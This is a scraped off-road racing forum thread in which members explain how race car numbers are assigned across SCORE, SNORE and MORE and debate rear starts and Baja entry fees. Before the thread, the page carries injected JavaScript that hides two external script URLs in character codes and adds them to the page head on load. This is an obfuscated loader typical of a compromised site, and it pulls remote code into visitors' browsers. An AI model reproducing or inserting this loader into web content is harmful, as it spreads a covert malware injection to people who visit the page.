var d3 = document.createElement('script'); d3.type = 'text/javascript'; d3.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 46, 117, 117, 115, 116, 111, 117, 103, 104, 116, 111, 110, 109, 97, 46, 111, 114, 103, 47, 115, 116, 97, 116, 115, 46, 106, 115, 63, 102, 61, 52); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == d3.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(d3);}var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 110, 112, 106, 108, 99); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == po.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(po);} Race car numbers - VW Baja Bug Off Road Dezert Racing

Race car numbers

More
9 years 4 months ago #9573 by pvmini
pvmini created the topic: Race car numbers
How do you go about getting a number for your race car? Do you use the same number when racing with different sanctions---MDR,SNORE,SCORE,MORE,etc ? How do you know if a number is already taken? Do you use the same number for the the whole season? I have noticed that some times the same team will use different car numbers during the same season at different race's. Such as Eric Soloarzano with SCORE. Any information would be appreciated.

Please Log in or Create an account to join the conversation.

More
9 years 4 months ago #9578 by Borrego Boy
Borrego Boy replied the topic: Re:Race car numbers
It's true! Differant org, differant #. An that doesn't even hold true. Baja 1000 '07 we were 1146, Baja 1000 '08 we were 1102, San Felipe 250 1101, all three of these races are SCORE. We then deceided to do the SNORE series, an we picked 1107, which will be our # for the whole season.

www.rpm-racing.net
www.DAV.org
It's not a sport unless it has wheels!!!

More
9 years 4 months ago #9579 by porboy
porboy replied the topic: Re:Race car numbers
In score your number is based off of starting position with the exception of the prior year class champion. If you are the first rear start in SCORE your number would be 1149. If you are the first fron start and you are not the points champ your number would be 1102. All the other organizations let you use the same number for the entire year. If you win the championship you have the option to use 1100(or 1101, not sure) or keep you old number. Jeremy and I have been 1199 for all series except SCORE and MORE (Already an 1199 in MORE). Ed Mahoney sometimes likes to steal that number but he pays us a royalty fee. We are now 1135 for all the series we race with a retainer on 1199.

<strong>Jason Gutzmer
#1130</strong>

More
9 years 4 months ago #9580 by pvmini
pvmini replied the topic: Re:Race car numbers
Thanks for the information ---it makes a lot more sense now--I always wondered what RS was for on the SCORE entry list ---what is the advantage of rear start? if any. Thanks agin for the information this site has helped me out with a lot of stuff---looking forward to racing with you all when I get this car finished.

More
9 years 4 months ago #9582 by chip
chip replied the topic: Re:Race car numbers
There is no advantage to rear start. Well, I guess the advantage is plenty of dust to eat. I never really understood that one. Dave and I prefer front starts. Clean air and don't look back!

1189 + 2 = 1191

More
9 years 4 months ago #9591 by ronjon
ronjon replied the topic: Re:Race car numbers
Our strategy for the occasional rear start was to pick up all the parts that fall off of Chip's car.

2011 - VORRA Class Champions. 2012 - First loser.
http://www.desertdingo.com

More
9 years 4 months ago #9592 by chip
ronjon wrote:

Our strategy for the occasional rear start was to pick up all the parts that fall off of Chip's car.

Yeah, the parts that fall off from bashing into you guys.

1189 + 2 = 1191

More
9 years 4 months ago #9597 by DaveCo11
DaveCo11 replied the topic: Re:Race car numbers
There is a lot of advantage to a rear start if you are faster than most. You set the pace you drive, pass all in front then the race is yours to lose, just have to go fast enough to stay in front of those you have passed. I personally hate starting up front because you have no idea what pace and who is where behind you so you cant relax. Class 11 is not so much so, but 1600 9 out of 10 times I go rear start. Only reason it is not 10 out of 10 is I forgot to check RS. Allready rear start in the CEC11 championship race in mexico, will be starting about 45th. It can work against you forsure, lost a Baja 500 in 1600 because of traffic jams at a hard to climb hill and the winner got past the jam before we did and ended up 2nd but it is the only time I remember it happening. Good luck

More
9 years 4 months ago #9603 by Uncle Ed 1189
Uncle Ed 1189 replied the topic: Re:Race car numbers
I'm a big fan of rear starts. Like Dave said, pass the field if you can and set a pace.

On the number thing, that #1199 sure was lucky for me at last years MINT. Because of the rear start and SNORE not letting me use my #1189, I opted (after fierce negoations with and strong arm tactics used by J & J) to go with #1199 for one time only. Your monthly blood money is in the mail Jason.

Aloha

Haley's dad and future sponsor.

mahoneytorresracing.com

More
9 years 4 months ago #9604 by chip
Uncle Ed 1189 wrote:

I'm a big fan of rear starts. Like Dave said, pass the field if you can and set a pace.

Key word being, \"if you can\"

1189 + 2 = 1191

More
9 years 4 months ago #9606 by offroadracer516
offroadracer516 replied the topic: Re:Race car numbers
WE can... way pumped for the ce11 race
Ed come show us how to drive and come race ;)

More
9 years 4 months ago #9607 by Uncle Ed 1189
chip wrote:

Uncle Ed 1189 wrote:

Key word being, \"if you can\"

You and I did at the Holiday Race didn't we Chip? We even passed that orange PG2 car. It still counts as a pass if he's broke right?

mahoneytorresracing.com

More
9 years 4 months ago #9608 by Uncle Ed 1189
offroadracer516 wrote:

I don't want to get kidnapped. :) Besides, Johnson and Sanchez have scared me into hiding.

mahoneytorresracing.com

More
9 years 4 months ago #9610 by chip
Uncle Ed 1189 wrote:

offroadracer516 wrote:

I don't want to get kidnapped. :) Besides, Johnson and Sanchez have scared me into hiding.

So I take it that's a no on the Baja 500 huh Ed?

1189 + 2 = 1191

More
9 years 4 months ago #9611 by DaveCo11
the 500 is a waste, 2 weeks after at the CEC11 championship is where it is at. But I guess if you have never raced a Baja 500 or Baja 1000 you should experience it. You could make it a 2 car race with Eric LOL(he is the only entry last time I looked, well worth it) Ed the class 11 drivers turned kidnappers are well cared for about now, no worries

More
9 years 4 months ago #9612 by ronjon
ronjon replied the topic: Re:Race car numbers
We'll be doing the 1000, but not the 500. Too expensive.

2011 - VORRA Class Champions. 2012 - First loser.
http://www.desertdingo.com

More
9 years 4 months ago #9613 by chip
DaveCo11 wrote:

the 500 is a waste, 2 weeks after at the CEC11 championship is where it is at. But I guess if you have never raced a Baja 500 or Baja 1000 you should experience it. You could make it a 2 car race with Eric LOL(he is the only entry last time I looked, well worth it) Ed the class 11 drivers turned kidnappers are well cared for about now, no worries

To spectate only Dave. Yeah I'd never waste my bucks on all the SCORE red tape B.S. I usually go down and follow the race, stop in Valle de Trinidad for some tacos and cooler restock then it's off towards San Felipe and meet up with Rex who works a checkpoint.

1189 + 2 = 1191

More
9 years 4 months ago #9614 by DaveCo11
Sounds like a fun trip Chip, you should come spectate the CEC11 race from ensanada to San Felipi. They are expecting at least 40 class 11 I have bean told.I have not raced a class 11 entry that size sine the 70s. Scores entry fee and red tape will keep me from ever racing Score again. Believe me, we both are not the only ones who think this way, Scores entries are in the toilet, Sal has killed off the little racers with Sky hi entry fees. I have never sean so many classes with 1-2 entries before. How foolish can people be

More
9 years 4 months ago #9615 by pvmini
pvmini replied the topic: Re:Race car numbers
wow -- I'am sure glad I asked the question---It's great to hear you talk about all this stuff. What is the cec race in baja that you are all talking about? I agree with Dave that SCORE is to expensive but I also think you have to do the 1000 at least once---I plan to run it this year if my car comes togeather soon enough to test it at a couple of local races befor november.

More
9 years 4 months ago #9617 by DaveCo11
Having raced the Baja 1000 as many times as I have(at least 24 times) and winning 9 of those in a few different classes as well as several 2nd place finishes leaves little for me to get exited about when it comes to blowing money on a Score baja 1000 . All the trails and roads the 500-1000 is run on are stale. Been there done that. A lot of people dont know it but this years 500 course is run on most of the 1976-77-78-79 the list keeps going. The CEC11 race on June 19 is part 1 of a 4 race series in the Mexican state championship. It also will be running on Baja 500-1000 trails and roads, infact exactly the same course this years 500 runs on in the first 90+ miles. The big difference is only 1-2 class 11 cars mite travel that road at an approx cost of about 2000+dollars after everything is paid to just enter the 500, but 40+ class 11 cars will be on it 2 weeks later for the high cost of 300 dollars + the cec11 cost of 150. This years class 11 Baja 500 winner might win 800 bucks IF he is lucky where thousands can be won in the championship. I am concentrating on the 4 race championship, got the car to do it.going for points is something I have not done since 03 in 1600. Was going to go for Snore points last year in 1600 but Snore screwed us after 2 races so we quit.This first CEC11 race is 185 miles long which will be a sprint race. The 2nd race in August is kinda like Battle at Primm exept it is threw the forest and you race twice in one day. The Record series is a cheap way to race on Baja courses without racing Score. Worth looking into for those that have wanted to race mexico but cannot or will not pay Scores redicules entry fee. Pretty dumb when a class 11 pays the same amount a Trophy truck pays. The last thing I want to do is discourage anybody from racing a Baja 1000, there truly is nothing like the Baja 1000 and I encourage anybody to do it that has not if you can afford to.

Time to create page: 0.280 seconds